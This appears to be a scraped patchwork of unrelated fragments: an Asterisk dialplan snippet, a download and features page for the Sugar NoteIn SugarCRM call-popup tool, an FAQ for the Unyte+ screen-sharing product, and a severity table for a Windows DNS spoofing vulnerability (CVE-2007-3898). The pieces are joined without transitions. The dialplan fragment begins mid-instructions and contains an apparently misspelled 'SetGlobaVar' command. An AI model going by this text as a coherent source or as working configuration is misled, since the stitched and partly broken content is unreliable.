2.2.3 #Into [macro-dialout-enum] context :

exten => s,n,Set(DIAL_NUMBER=${DIAL_NUMBER})

...

exten => s,n,NoOp(-----------------------******************-----)

exten => s,n,SetGlobaVar(ADM=${DIAL_NUMBER})

exten => s,n,NoOp(-----------------------******************-----)

Download page

Client :

Linux/Unix version (27 Mo):

ADM_unix_1_1_jre1_5_bundle.sh

French version :

ADM_unix_1_1_jre1_5_bundle_fr.sh

configuration Script for Linux client (Fedora).

script_install.sh

Windows version (22 Mo):

ADM_windows_1_1_jre1_5_bundle.exe

French version :

ADM_windows_1_1_jre1_5_bundle_fr.exe

Mac version :

Not available

Server :

Sugar_NoteIn_beta3.tar

French version :

Sugar_notein_beta3_fr.tar

Installation script for Linux/Unix server :

install_noteIn.sh

View installation guide here

Patch for file function.php

Sugar NoteIn* features :

Sugar NoteIn* offers you the following features

SugarCRM Popup:

Your contact's detailed profile pops up into your browser when you receive a phone call.

Add quickly a new user and his phone number into sugar CRM when it is an unknown number/a new contact.

Quick access to mails, notes and calls history about your contact when it is calling you.

Choose to disable the popup in one click for all calls, only outbound calls or only internals calls.

Works with tables "Contacts", "leads", "Opportunities" and "Accounts" of sugarCRM.

Quick Note :

Write a quick note about your contact, check his profile and talk to him at the same time.

The note is automatically added and affected to your selected contact into sugarcrm.

For the moment, Sugar NoteIn* is only available for Unix/Linux and windows operating systems. We hope to have a Mac version soon.

Modulis products Sugar NoteIn* as a free and open-source solution.The contents Sugar NoteIn* are subject to the GNU GENERAL PUBLIC LICENSE. The Initial Developer of the original code is Michael Mangili-Vincent.

What is Unyte+™?

2007-09-17T12:57:00.000-07:00

WebDialogs Unyte+ is a quick, easy and secure way to bring people and information together online. Use Unyte+ to show your desktop or share documents and applications with colleagues, friends and family anytime, anywhere.

An intuitive application, Unyte+ seamlessly integrates with chat, instant messaging and voice solutions allowing seamless escalation from one mode of communication to another.

Is Unyte+™ secure?

All Unyte+™ communication is 128bit SSL encrypted. Unyte+™ invitation keys are unique and nearly impossible to guess. No access to Unyte+ user’s system could be granted without explicit permission by the user.

What is Unyte Lyte?

Unyte Lyte is a free plug-in that allows you to conference with one participant and has several of the features available in Unyte+. Included are desktop viewing, SSL encryption, Skype integration, P2P all delivered through a web based application. For a complete comparison, click here.

How much does it cost?

For the first 30 days you will enjoy all the features of Unyte+ for FREE. This free trial will allow you to meet with four other participants at any time as often as you like. For a list of all the features in Unyte+ click here.

After 30 days you can choose to purchase a quarterly or annual subscription for Unyte+ or you can simply do nothing and your plug-in will turn into a Unyte Lyte account that you can continue to use at any time as often as you want for FREE. It's your choice, no commitments, no obligations.

To view a list of Unyte+ subscription options, click here.

Download Unyte+ 2.5

Download

Release Version: 2.5.4.22; Release Date: August 21, 2007
File Size: 1.23MB
Subscribe for updates

Vulnerability Severity Rating and Maximum Security Impact by Affected Software
Affected Software	DNS Spoofing Attack Vulnerability – CVE-2007-3898	Aggregate Severity Rating
Microsoft Windows 2000 Server Service Pack 4	Important Spoofing	Important
Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2	Important Spoofing	Important
Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2	Important Spoofing	Important
Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems	Important Spoofing	Important